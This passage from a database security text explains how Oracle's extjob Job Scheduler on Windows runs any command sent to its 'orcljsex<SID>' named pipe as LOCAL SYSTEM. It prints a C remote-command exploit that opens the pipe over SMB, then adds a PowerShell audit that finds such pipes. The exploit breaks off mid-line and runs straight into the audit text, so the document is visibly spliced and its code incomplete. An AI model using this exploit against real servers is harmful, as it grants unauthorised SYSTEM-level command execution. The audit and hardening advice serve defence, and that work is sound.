10.4. Running OS Commands Directly with the Job Scheduler

The Job Scheduler is implemented as an external process — extjob. On Windows this runs with the privileges of the LOCAL SYSTEM operating system account. It listens on a named pipe called "orcljsex<SID>", where SID is the database system identifier. When the Job Scheduler receives a command down this named pipe, it simply attempts to execute it. As such, anyone who can connect to the named pipe, whether locally or across the network using SMB, can run commands as LOCAL SYSTEM and fully compromise the server:

/* Oracle External Job Remote Command Exploit
   Oracle's extjob.exe listens on a named pipe "orcljsex<SID>" and executes
   commands sent through it.
*/

#include <stdio.h>
#include <windows.h>

int main(int argc, char *argv[])
{
    char buffer[540]="";
    char NamedPipe[260]="\\\\";
    HANDLE rcmd=NULL;
    char *ptr = NULL;
    int len =0;
    DWORD Bytes = 0;

    if(argc !=4)
    {
        printf("\n\tOracle External Job Remote Command Exploit.\n\n");
        printf("\tUsage: oraextjob target SID \"command\"\n");
        printf("\n\tDavid Litchfield\n\t(david@ngssoftware.com)\n\t1st October 2006\n");
        return 0;
    }

    strncat(NamedPipe,argv[1],100);
    strcat(NamedPipe,"\\pipe\\orcljsex");
    len = strlen(NamedPipe);
    if(len>256)
        return printf("Too long...\n");
    len = 256 - len;

    // tack on the SID
    strncat(NamedPipe,argv[2],len);

    // Open the named pipe
    rcmd = CreateFile(NamedPipe,GENERIC_WRITE|GENERIC_READ,0,NULL,OPEN_EXISTING,0,NULL);
    if(rcmd == INVALID_HANDLE_VALUE)
        return printf("Failed ...
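For the defender, the practical question is whether a given database host exposes an extjob pipe at all, and which account is behind it. The following PowerShell audit is an added example, not code from the book or from Oracle: it enumerates the local named pipes (Windows exposes them as files under \\.\pipe\), picks out every "orcljsex<SID>" pipe, and reports the account the matching Job Scheduler service runs as. The service name pattern OracleJobScheduler<SID> is an assumption about the default installation naming; adjust it if your services are named differently.

```powershell
# Added audit example (not from the book): find Oracle Job Scheduler named pipes
# on this host and show which account each one's service runs as.
function Get-OracleJobSchedulerPipe {
    # Every named pipe on the machine is visible as a file under \\.\pipe\
    $pipes = [System.IO.Directory]::GetFiles('\\.\pipe\')

    foreach ($p in $pipes) {
        $name = [System.IO.Path]::GetFileName($p)
        if ($name -notlike 'orcljsex*') { continue }

        # The part after the fixed prefix is the database SID
        $sid = $name.Substring('orcljsex'.Length)

        # Assumed service naming convention: OracleJobScheduler<SID>
        $svc = Get-CimInstance Win32_Service -Filter "Name='OracleJobScheduler$sid'" -ErrorAction SilentlyContinue

        $service = '(not found)'
        $runsAs  = '(unknown)'
        $state   = '(unknown)'
        if ($svc) {
            $service = $svc.Name
            $runsAs  = $svc.StartName   # 'LocalSystem' is the exposure described above
            $state   = $svc.State
        }

        [PSCustomObject]@{
            Pipe    = $p
            SID     = $sid
            Service = $service
            RunsAs  = $runsAs
            State   = $state
        }
    }
}

# Run the audit; an entry whose RunsAs is 'LocalSystem' with the service running
# means any caller that can open the pipe gets SYSTEM-level command execution.
Get-OracleJobSchedulerPipe | Format-Table -AutoSize
```

Run it on the database server itself (the pipe listing is local). A row whose RunsAs column is LocalSystem and whose State is Running is the configuration the text describes; pair the finding with a check that TCP 445 on that host is not reachable from untrusted networks, since the pipe is also opened over SMB.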
